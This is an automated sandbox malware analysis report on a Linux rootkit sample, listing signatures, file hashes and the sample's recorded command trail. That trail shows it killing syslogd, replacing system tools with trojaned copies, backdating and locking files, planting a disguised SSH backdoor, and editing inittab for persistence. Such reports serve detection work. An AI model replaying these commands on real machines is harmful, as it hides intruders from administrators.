Malware Analysis Report

2024-10-16 06:10

Sample ID 240715-29pykawhmc
Target 4bd599176fbaab489642f3fafb083862_JaffaCakes118
SHA256 c7d3a16ba29abcf5261b66af753f44124fcb3a303059f7cee04334983a3b6d16
Tags
antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

c7d3a16ba29abcf5261b66af753f44124fcb3a303059f7cee04334983a3b6d16

Threat Level: Shows suspicious behavior

The file 4bd599176fbaab489642f3fafb083862_JaffaCakes118 was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm

Executes dropped EXE

Enumerates running processes

Write file to user bin folder

Attempts to change immutable files

Checks CPU configuration

Reads CPU attributes

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-15 23:17

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-15 23:17

Reported

2024-07-15 23:19

Platform

debian9-armhf-20240611-en

Max time kernel

24s

Max time network

25s

Command Line

[/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /usr/sbin/ttyload /usr/sbin/ttyload N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/hostname N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Enumerates running processes

Write file to user bin folder

Description Indicator Process Target
File opened for modification /usr/sbin/ttyload /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /bin/cat N/A

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/26/stat /usr/bin/killall N/A
File opened for reading /proc/41/stat /usr/bin/killall N/A
File opened for reading /proc/274/stat /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/28/stat /usr/bin/killall N/A
File opened for reading /proc/19/cmdline /bin/pidof N/A
File opened for reading /proc/148/stat /usr/bin/killall N/A
File opened for reading /proc/633/stat /usr/bin/killall N/A
File opened for reading /proc/587/stat /bin/pidof N/A
File opened for reading /proc/625/cmdline /bin/pidof N/A
File opened for reading /proc/16/stat /usr/bin/killall N/A
File opened for reading /proc/109/stat /usr/bin/killall N/A
File opened for reading /proc/162/stat /usr/bin/killall N/A
File opened for reading /proc/139/cmdline /bin/pidof N/A
File opened for reading /proc/76/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/303/cmdline /bin/pidof N/A
File opened for reading /proc/587/status /bin/ps N/A
File opened for reading /proc/303/stat /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/633/cmdline /bin/pidof N/A
File opened for reading /proc/28/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/23/cmdline /bin/ps N/A
File opened for reading /proc/299/stat /usr/bin/killall N/A
File opened for reading /proc/136/cmdline /usr/bin/killall N/A
File opened for reading /proc/277/stat /usr/bin/killall N/A
File opened for reading /proc/275/stat /usr/bin/killall N/A
File opened for reading /proc/588/stat /bin/ps N/A
File opened for reading /proc/98/stat /usr/bin/killall N/A
File opened for reading /proc/139/stat /usr/bin/killall N/A
File opened for reading /proc/633/stat /usr/bin/killall N/A
File opened for reading /proc/587/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/633/stat /usr/bin/killall N/A
File opened for reading /proc/588/stat /usr/bin/killall N/A
File opened for reading /proc/635/stat /usr/bin/killall N/A
File opened for reading /proc/274/stat /usr/bin/killall N/A
File opened for reading /proc/25/stat /usr/bin/killall N/A
File opened for reading /proc/43/cmdline /bin/pidof N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/585/stat /usr/bin/killall N/A
File opened for reading /proc/109/cmdline /usr/bin/killall N/A
File opened for reading /proc/762/stat /bin/pidof N/A
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/109/stat /usr/bin/killall N/A
File opened for reading /proc/148/stat /usr/bin/killall N/A
File opened for reading /proc/140/stat /usr/bin/killall N/A
File opened for reading /proc/278/stat /usr/bin/killall N/A
File opened for reading /proc/630/stat /usr/bin/killall N/A
File opened for reading /proc/314/cmdline /bin/ps N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/633/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/23/status /bin/ps N/A
File opened for reading /proc/635/stat /usr/bin/killall N/A
File opened for reading /proc/98/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/274/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /bin/pidof N/A
File opened for reading /proc/633/stat /usr/bin/killall N/A
File opened for reading /proc/26/stat /usr/bin/killall N/A
File opened for reading /proc/136/stat /usr/bin/killall N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/conf/hosts.h /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.init1 /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.init2 /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.shmd5 /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.procs /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.stats /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/info_tmp /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/bin/.sh/sshd_config /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A

Processes

/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118

[/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118]

/usr/bin/whoami

[whoami]

/bin/tar

[tar zxf ./bin.tgz]

/bin/tar

[tar zxf ./conf.tgz]

/bin/tar

[tar zxf ./lib.tgz]

/bin/tar

[tar zxf ./utilz.tgz]

/bin/tar

[tar zxf ./sshd.tgz]

/bin/rm

[rm -rf ./sshd.tgz]

/bin/rm

[rm -rf bin.tgz conf.tgz lib.tgz utilz.tgz]

/bin/sleep

[sleep 2]

/usr/bin/killall

[killall -9 syslogd]

/bin/date

[date +%S]

/bin/sleep

[sleep 2]

/bin/hostname

[hostname -f]

/bin/grep

[grep -v ^# /etc/syslog.conf]

/bin/grep

[grep -v ^$]

/bin/grep

[grep @]

/usr/bin/cut

[cut -d @ -f 2]

/bin/uname

[uname -n]

/bin/mv

[mv lib/libproc.a /lib/]

/bin/mv

[mv lib/libproc.so.2.0.6 /lib/]

/sbin/ldconfig

[/sbin/ldconfig]

/usr/bin/md5sum

[md5sum]

/usr/bin/touch

[touch -acmr /bin/ls /etc/sh.conf]

/bin/chown

[chown -f root:root /etc/sh.conf]

/usr/bin/chattr

[chattr +isa /etc/sh.conf]

/bin/rm

[rm -rf /tmp/bin/.sh/shdcf2]

/bin/mv

[mv /tmp/bin/.sh/sshd_config /tmp/bin/.sh/shdcf]

/bin/mv

[mv /tmp/conf/lidps1.so /lib/lidps1.so]

/usr/bin/touch

[touch -acmr /bin/ls /lib/lidps1.so]

/usr/bin/touch

[touch -acmr /bin/ls /tmp/conf/*]

/bin/mv

[mv /tmp/conf/* /usr/include/]

/bin/mkdir

[mkdir /lib/libsh.so]

/usr/bin/touch

[touch -acmr /bin/ls /lib/libsh.so]

/bin/mkdir

[mkdir /usr/lib/libsh]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh]

/bin/mv

[mv .sh/* /lib/libsh.so/]

/bin/mv

[mv .sh/.bashrc /usr/lib/libsh]

/bin/mv

[mv /lib/libsh.so/sshd /sbin/ttyload]

/bin/chmod

[chmod a+xr /sbin/ttyload]

/bin/chmod

[chmod o-w /sbin/ttyload]

/usr/bin/touch

[touch -acmr /bin/ls /sbin/ttyload]

/usr/bin/chattr

[chattr +isa /sbin/ttyload]

/bin/pidof

[pidof ttyload]

/bin/mv

[mv /tmp/bin/ttymon /sbin/ttymon]

/bin/chmod

[chmod a+xr /sbin/ttymon]

/usr/bin/touch

[touch -acmr /bin/ls /sbin/ttymon]

/usr/bin/chattr

[chattr +isa /sbin/ttymon]

/bin/pidof

[pidof ttymon]

/bin/cp

[cp /bin/bash /lib/libsh.so]

/usr/bin/chattr

[chattr -isa /etc/inittab]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep -v ttyload]

/bin/grep

[grep -v getty]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep getty]

/bin/cat

[cat /tmp/.init2]

/usr/bin/touch

[touch -acmr /bin/ls /usr/sbin/ttyload]

/bin/chmod

[chmod +x /usr/sbin/ttyload]

/usr/bin/chattr

[chattr +isa /usr/sbin/ttyload]

/usr/sbin/ttyload

[/usr/sbin/ttyload]

/sbin/ttyload

[/sbin/ttyload -q]

/sbin/ttymon

[/sbin/ttymon]

/usr/bin/touch

[touch -amcr /etc/inittab /tmp/.init1]

/bin/mv

[mv -f /tmp/.init1 /etc/inittab]

/bin/rm

[rm -rf /tmp/.init2]

/bin/grep

[grep ttyload /etc/inittab]

/usr/bin/md5sum

[/usr/bin/md5sum /bin/ps]

/usr/bin/md5sum

[/usr/bin/md5sum /bin/ls]

/usr/bin/md5sum

[/usr/bin/md5sum /usr/bin/find]

/usr/bin/md5sum

[/usr/bin/md5sum /usr/bin/top]

/usr/bin/md5sum

[/usr/bin/md5sum /usr/bin/md5sum]

/tmp/encrypt

[./encrypt -e .shmd5 /dev/srd0]

/usr/bin/touch

[touch -acmr /bin/ls /dev/srd0]

/usr/bin/chattr

[chattr a+r /dev/srd0]

/bin/chown

[chown -f root:root /dev/srd0]

/bin/rm

[rm -rf .shmd5]

/usr/bin/touch

[touch -acmr /sbin/ifconfig ifconfig]

/usr/bin/touch

[touch -acmr /bin/ps ps]

/usr/bin/touch

[touch -acmr /bin/ls ls]

/usr/bin/touch

[touch -acmr /bin/netstat netstat]

/usr/bin/touch

[touch -acmr /usr/bin/find find]

/usr/bin/touch

[touch -acmr /usr/bin/top top]

/usr/bin/touch

[touch -acmr /usr/sbin/lsof lsof]

/usr/bin/touch

[touch -acmr /sbin/syslogd syslogd]

/usr/bin/touch

[touch -acmr /usr/bin/slocate slocate]

/usr/bin/touch

[touch -acmr /usr/bin/dir dir]

/usr/bin/touch

[touch -acmr /usr/bin/md5sum md5sum]

/usr/bin/touch

[touch -acmr /usr/bin/pstree pstree]

/bin/mkdir

[mkdir /usr/lib/libsh/.backup]

/usr/bin/chattr

[chattr -isa /bin/ps]

/bin/cp

[cp /bin/ps /usr/lib/libsh/.backup]

/bin/mv

[mv -f ps /bin/ps]

/usr/bin/chattr

[chattr +isa /bin/ps]

/usr/bin/chattr

[chattr -isa /sbin/ifconfig]

/bin/cp

[cp /sbin/ifconfig /usr/lib/libsh/.backup]

/bin/mv

[mv -f ifconfig /sbin/ifconfig]

/usr/bin/chattr

[chattr +isa /sbin/ifconfig]

/usr/bin/chattr

[chattr -isa /bin/netstat]

/bin/cp

[cp /bin/netstat /usr/lib/libsh/.backup]

/bin/mv

[mv -f netstat /bin/netstat]

/usr/bin/chattr

[chattr +isa /bin/netstat]

/usr/bin/chattr

[chattr -isa /usr/bin/top]

/bin/cp

[cp /usr/bin/top /usr/lib/libsh/.backup]

/bin/mv

[mv -f top /usr/bin/top]

/usr/bin/chattr

[chattr +isa /usr/bin/top]

/usr/bin/chattr

[chattr -isa /bin/ls]

/bin/cp

[cp /bin/ls /usr/lib/libsh/.backup]

/bin/mv

[mv -f ls /bin/ls]

/usr/bin/chattr

[chattr +isa /bin/ls]

/usr/bin/chattr

[chattr -isa /usr/bin/find]

/bin/cp

[cp /usr/bin/find /usr/lib/libsh/.backup]

/bin/mv

[mv -f find /usr/bin/find]

/usr/bin/chattr

[chattr +isa /usr/bin/find]

/usr/bin/chattr

[chattr -isa /usr/bin/pstree]

/bin/cp

[cp /usr/bin/pstree /usr/lib/libsh/.backup]

/bin/mv

[mv -f pstree /usr/bin/pstree]

/usr/bin/chattr

[chattr +isa /usr/bin/pstree]

/usr/bin/chattr

[chattr -isa /usr/bin/md5sum]

/bin/cp

[cp /usr/bin/md5sum /usr/lib/libsh/.backup]

/bin/mv

[mv -f md5sum /usr/bin/md5sum]

/usr/bin/chattr

[chattr +isa /usr/bin/md5sum]

/usr/bin/touch

[touch -acmr /bin/ls /tmp/utilz]

/usr/bin/touch

[touch -acmr /bin/ls /tmp/utilz/*]

/bin/mv

[mv /tmp/utilz /usr/lib/libsh/]

/bin/mkdir

[mkdir /usr/lib/libsh/.sniff]

/bin/mv

[mv /tmp/bin/shsniff /usr/lib/libsh/.sniff/shsniff]

/bin/mv

[mv /tmp/bin/shp /usr/lib/libsh/.sniff/shp]

/bin/mv

[mv /tmp/bin/shsb /usr/lib/libsh/shsb]

/bin/mv

[mv /tmp/bin/hide /usr/lib/libsh/hide]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/.sniff/shsniff]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/.sniff/shp]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/shsb]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/hide]

/bin/chmod

[chmod +x /usr/lib/libsh/.sniff/*]

/bin/chmod

[chmod +x /usr/lib/libsh/shsb]

/bin/chmod

[chmod +x /usr/lib/libsh/hide]

/bin/ps

[ps aux]

/bin/cat

[cat /tmp/.procs]

/bin/grep

[grep named]

/bin/cat

[cat /tmp/.procs]

/bin/grep

[grep smbd]

/bin/cat

[cat /tmp/.procs]

/bin/grep

[grep rpc.statd]

/bin/rm

[rm -rf /tmp/.procs]

/bin/cat

[cat /tmp/.stats]

/bin/grep

[grep 443]

/bin/grep

[grep http]

/bin/rm

[rm -rf /tmp/.stats]

/bin/mkdir

[mkdir /usr/lib/libsh/.owned]

/usr/bin/chattr

[chattr +isa /usr/lib/libsh]

/usr/bin/chattr

[chattr +isa /lib/libsh.so]

/usr/bin/killall

[killall -9 -q nscd]

/usr/bin/killall

[killall -9 -q xntps]

/usr/bin/killall

[killall -9 -q mountd]

/usr/bin/killall

[killall -9 -q mserv]

/usr/bin/killall

[killall -9 -q psybnc]

/usr/bin/killall

[killall -9 -q t0rns]

/usr/bin/killall

[killall -9 -q linsniffer]

/usr/bin/killall

[killall -9 -q sniffer]

/usr/bin/killall

[killall -9 -q lpsched]

/usr/bin/killall

[killall -9 -q sniff]

/usr/bin/killall

[killall -9 -q sn1f]

/usr/bin/killall

[killall -9 -q sshd2]

/usr/bin/killall

[killall -9 -q xsf]

/usr/bin/killall

[killall -9 -q xchk]

/usr/bin/killall

[killall -9 -q ssh2d]

/sbin/ifconfig

[/sbin/ifconfig eth0]

/bin/grep

[grep inet addr:]

/usr/bin/awk

[awk -F {print $2} ]

/usr/bin/cut

[cut -c6-]

/bin/hostname

[hostname -f]

/bin/uname

[uname -a]

/usr/bin/awk

[awk { print $11 }]

/bin/cat

[cat /tmp/info_tmp]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep bogomips]

/usr/bin/awk

[awk {print $3}]

/bin/hostname

[hostname -i]

/sbin/ifconfig

[/sbin/ifconfig]

/bin/grep

[grep eth]

/usr/bin/wc

[wc -l]

/usr/bin/head

[head -1 /etc/debian_version]

/bin/rm

[rm -rf /tmp/info_tmp]

/bin/date

[date +%S]

/usr/bin/expr

[expr 33 - 13]

/sbin/iptables

[/sbin/iptables -L input]

/usr/bin/head

[head -5]

/sbin/syslogd

[/sbin/syslogd -m 0]

/bin/rm

[rm -rf ../shv5*]

Network

Country Destination Domain Proto
US 1.1.1.1:53 debian9-armhf-20240611-en-0 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-0 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-0 udp

Files

/var/cache/ldconfig/aux-cache~

MD5 a6bf94354cfeba3dbcd11f945c9675c4
SHA1 a27339c994e7b65ef52ae9dc38a625b8d2241bf6
SHA256 13eaf12dd225106747bd57c2bdc230e109038d83a2feaff34ab1148dbf9d9c28
SHA512 0e495be99718139c7a8bde0b4f73fb995465c31d74ecc6ec696d7e8e17f0f6767950f94e6d5962e1541902ef93b6c35e4d90bdae38eb13327f1dfb830188a1e7

/lib/libsh.so/bash

MD5 c119e30e6cf65d40abec2ebdc4f1e9cb
SHA1 67fd5fdf3161a0c086932074844a8bbf444b8911
SHA256 6b66d1462c569b1fd6de35d4a4efc7dfbd8bfe59a20c9a17b506ac468abf098b
SHA512 2d8e1a6820e206e43c0449bbe4b613d19d63853270b3d0bdc5be12d4bcab89dcd4f5def8a81126d51984a9e8169526d1b44996a2c0a18bfb1d764040c865fe89

/tmp/.init1

MD5 ba6ed6a3d425270d5374b0c2b54b3008
SHA1 58635a2e5fa938e55f777cb55a6df5fe44f6b4ec
SHA256 91c48fb19d87c95033df44d44e58474ab5e2a7176d231c11bb5e45c7d52fa359
SHA512 6f2ecc0fe867ec1cc575dc8cbba8566ac32dea4252b355f4267afb18d15dd759baecac3d8b74656a6008b7d20be3033ee4650f8b9cece8c2eb2466dc6fcecd0c

/tmp/.init1

MD5 0dae4739f83623a59236ecfabe00007b
SHA1 4b2b361ba9cf76213d2c4d6ba67e80099405f810
SHA256 513dfa0b7341549c6141df2ebdf1eedf72f1904d47725a17213b3bcb80916ac0
SHA512 12ab203d1434f29cf4b5f81d72a0790d9ddacd20df5d71e2a0d429b2bc8c80cff5c4a4c1332452deb9d84817088a1223f55ef2411f0605cfbe00eb2fe8aa1d74

/tmp/.init1

MD5 21df30feebe94d25ce99e861e3642895
SHA1 3624439d7e9ac4463f83f1658205367ef27a2234
SHA256 d3bfdb3e0f63a093f8e9bff6925ddc52429fe09fe4de521add28b373d44fe0f5
SHA512 26fbc52d5c2984a74673397e6edce3bf8a14e4d52a1abc7ffdfbf1bae9768b2583512632625d01bac896c623b0ec10fa24f6aa3c54ec2a70450b02d9bb37cecb

/tmp/.init1

MD5 74e8461d4c9dd715082f15ef51e3ecac
SHA1 0504be0510ac79c4f7c8d5477032408f9b63a651
SHA256 9fff95a586ab017f278fbf2f579d424e29164b5fae02f509176b9a600c4091de
SHA512 0682c5966466f49b1f53b872e5f10a4264f11a65f198f8e780365e6c683899815f90613cf8cd900d7b8d47247c343ab6002183a405313ac07fe026a2f634e02c

/tmp/.init1

MD5 8c053b4b674ebfcf6d38503608c5c8db
SHA1 9927d232e5bb15e3b6bbe461e0041d74649b963a
SHA256 6bdd745ccb67873f8e05c871ea6f153bb4daa683d7873e22c93fa716f53f61dc
SHA512 35320ff6eed384649f02262a46bf9fdabdcf1f9808738b7c6af3fea01a1b54c963d038c984c3d794445030632ab1ae38c8d6bbf319a362233a40ac9314a55222

/usr/sbin/ttyload

MD5 b46702355aecfc0bd14c525655eccb8b
SHA1 85ae2258fdf63f04130470356e4d0ba13cce49b4
SHA256 d4fe551995b5a5c5c71656ad1bf102c790f0a8a8415e1331ee9948e451a23db7
SHA512 db411c4f553c0eefd8672bf395679d48fe7dd9ad467d2ee5e738dd62815b2091c191c32db87bf88ae1aad3689a020c2e565091e1086f5fd1733c75847091f151

/usr/sbin/ttyload

MD5 53e75bf7964b0fb15cbe3028a151ed65
SHA1 116589e3b65166f73be2c6e8bb3b09c07641a762
SHA256 550618b776401129e1bf6000bc28a7891ab0a6431bac3382be1ee1a585282805
SHA512 ec2f45bc08e02e16db6db32bb71daff158c4044ed7268b696a62bf0efe9de59c331d6afb0b9101b5686e41cc701c491d75b0617c18bb68fb3393bea2ba702316

/tmp/.shmd5

MD5 f0a2dccf108969338c829700d2dedbea
SHA1 8daa48f1b0d9fe0f5204e5fbe53219ec3bd6bfe4
SHA256 18883af5bb7d532b29d96a5f574180b69a2e717cec2d9bdb7281121b0c7b88a6
SHA512 67ab595bdaa10dc47ea3cb479d3a4741eef538e4088726bb9e64988234d9a5cf9d0df876e1ebbd00fb79615e1aefeb8006bba4026a76e03f75aa5f3039d12f49

/tmp/.shmd5

MD5 dc1735d96a90ff69ba41bf58c3bc2f39
SHA1 b5cbca6a62f9acb5c098f8f86a24f91412fa394d
SHA256 7a8ab94bbac31a0f8ccbb76d7be88081936d23850927e34d75fc0c2e9b7d0f24
SHA512 b176b66ff17fed27df65261beb14a1539079bf36e8bebcce894852296612088f0bcc69ad6d153936060289a35f3408a65b44578fd62b1da7db724808398ca0f6

/tmp/.shmd5

MD5 857c3956d4a1a4582e141faffb4b1779
SHA1 e8a492beb7474ec753feb22218ec80ef225fba48
SHA256 240ff5077cf70e5bdd3db05117b6616220b5fb640204e7f09098ba2533bb71b1
SHA512 8dd66b41ae1cf9779ddeac7d6ec965e505632c5d68151a029d349416930953f900959aba8b2f77d4a2477140ed3ec3422c9fa43d164efb12ca6cca465711b2a3

/tmp/.shmd5

MD5 fa8d0415321078ae192da3f4126ecce8
SHA1 75cf9b5aecb0801f6a4d9f5b9a7b8276c6f72cb3
SHA256 b0a80b13087310fd54ff6ae57345a499cbb2b3fa2b0e6dd0e5cbe5c63bc3b21d
SHA512 941c83e63e1fbd481a2928a0e1f4e02deec4434989d7b28796203d5417de9a0fe7adee44d857136dbb0961209ef349ad6667600a83a8fc6949dda138aea1cc87

/tmp/.shmd5

MD5 d1220027882f8ccaf610795654f25b77
SHA1 e03d19c941c886cfc84e0644acf4ca65647c2b92
SHA256 93163ae54ecefea14f7c701c15e9c909582036b8fd8f61a94ff3c91dd90bf0de
SHA512 3b4cde3abc06e2d571fac45d3f270e944e8ef235e5fa7a8eb7b16163f6c6f9624484e637fe2373d869a553e1c5786dbe8150abc4f317347aa569782d3aef47a4

/usr/lib/libsh/.backup/ps

MD5 c93283a1ee71686a4c9c1a58495d61aa
SHA1 e3a549212766c446f419cb20b627406a7c9cb372
SHA256 5268d4cdcb0b1988dd8e1a549d3f68af322242ed05f0d7d46f263590fe138f95
SHA512 0306a45375926837688073f0408e11a9236c143381aa9fd98c998feb523daa1f1f7ca1cb27ac3c62749b53149115315bba3527f06ef873e9416cd7a68537fcf5

/usr/lib/libsh/.backup/top

MD5 16f0b6ac13b75fb60b9177800b730cc0
SHA1 601e899aa19be08acc6965a17013807465757b9b
SHA256 55d4baa5703049edd1091ab97e845ffa50af06427480c09637219751ab7517b2
SHA512 f94d34cf451053146736a13cfb3d1b93ea22660544baa495e828f7d7dc01276bfcff8985cc35035b672655efcbf1607cdcd879ffe4ffe311b406ca22cc70df47

/usr/lib/libsh/.backup/ls

MD5 fd8041181f67149d6b84bed1401c0f3b
SHA1 6824b1ee73a9f50a97369a674a009ec687a09cff
SHA256 e83717a87080eae8bd6772e08fe4b83c54cc1c5672cc02edf0e60de227118a95
SHA512 a58ab85e69dd41f4c8d79c07eede01e240d0201957a96a386a6256a1474852fde4dce850f0237e664812a03801e57a50fa70a4b0da05e6ab65d1fae2e6277a75

/usr/lib/libsh/.backup/find

MD5 138a27d6fe52fa1132760a4fa48922e0
SHA1 e0250e4d7bf33a5a1064344224148b889cb15138
SHA256 81a10dad907b23521461bd3fc83c2cedb2218933a328d9a05e3c9f6a9a1d42aa
SHA512 ee0078afad63fc2aaffdebb7127d1c7d4459287fee75358f57c82d397c39b7bf64338fb6996dfb1747cd9a896d714b3c76f0948727be91550f1affa1c0298a9e

/usr/lib/libsh/.backup/pstree

MD5 d326548ef8d6a8cb14b495115c6e9c73
SHA1 fee8b30669dc67e207bf6fcb2d36838f65a5c69a
SHA256 8af3af6bf27f219619ca657f86e124fb5ee85d779df8af79a78eaf19a930224b
SHA512 a5b6b1744da59b5531dd644ee318febd7588a7e0e8aa8b4543106ef0b00a4318a8fe2e6bd11c7ca85be61e59c9ff5643067e076ff9af19f4d1c663d7e3408c57

/usr/lib/libsh/.backup/md5sum

MD5 8e89133057a1152e19e05fcfd5034aae
SHA1 94301c22a1137deef4797a26eb04a4f68b814d96
SHA256 7eb9347d691bea01ec8fcce0f055d0b94e36a9615bc69c203f764540b32047eb
SHA512 f43d2b23033ff34d6bd9dfcb3a88a45fd59195638961b5192be4fc0d4d8304520e870bea1c9689f1ce1c84506b5e1f296a88961d1c88fca0a62d52cddffb0700

/tmp/.procs

MD5 aef0778609d12066a26732722ab63f42
SHA1 f6d97eaa94003ea3f70907c9d4a3fb50ffb57525
SHA256 eca3253479966699a6377c78df0e2934915e571658fa3b5788230582d9c3d8ae
SHA512 2925512da6c5728fb73e62d88cc9f8da9377be2d396d69d181e532730f3daebf188cd70818bb27003960e7d26904bec5b18240fde40d711ca89da3650ed8f69e

/tmp/info_tmp

MD5 68b329da9893e34099c7d8ad5cb9c940
SHA1 adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512 be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Analysis: behavioral3

Detonation Overview

Submitted

2024-07-15 23:17

Reported

2024-07-15 23:19

Platform

debian9-mipsbe-20240611-en

Max time kernel

72s

Max time network

73s

Command Line

[/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /usr/sbin/ttyload /usr/sbin/ttyload N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/hostname N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Enumerates running processes

Write file to user bin folder

Description Indicator Process Target
File opened for modification /usr/sbin/ttyload /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /bin/cat N/A

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/704/stat /usr/bin/killall N/A
File opened for reading /proc/345/stat /bin/pidof N/A
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/6/stat /bin/ps N/A
File opened for reading /proc/402/stat /usr/bin/killall N/A
File opened for reading /proc/73/stat /usr/bin/killall N/A
File opened for reading /proc/146/stat /usr/bin/killall N/A
File opened for reading /proc/310/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/81/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/886/cmdline /usr/bin/killall N/A
File opened for reading /proc/72/cmdline /bin/ps N/A
File opened for reading /proc/73/stat /usr/bin/killall N/A
File opened for reading /proc/532/stat /usr/bin/killall N/A
File opened for reading /proc/313/stat /bin/pidof N/A
File opened for reading /proc/371/cmdline /bin/ps N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/383/stat /usr/bin/killall N/A
File opened for reading /proc/145/stat /usr/bin/killall N/A
File opened for reading /proc/371/stat /usr/bin/killall N/A
File opened for reading /proc/76/stat /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/72/stat /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/36/stat /usr/bin/killall N/A
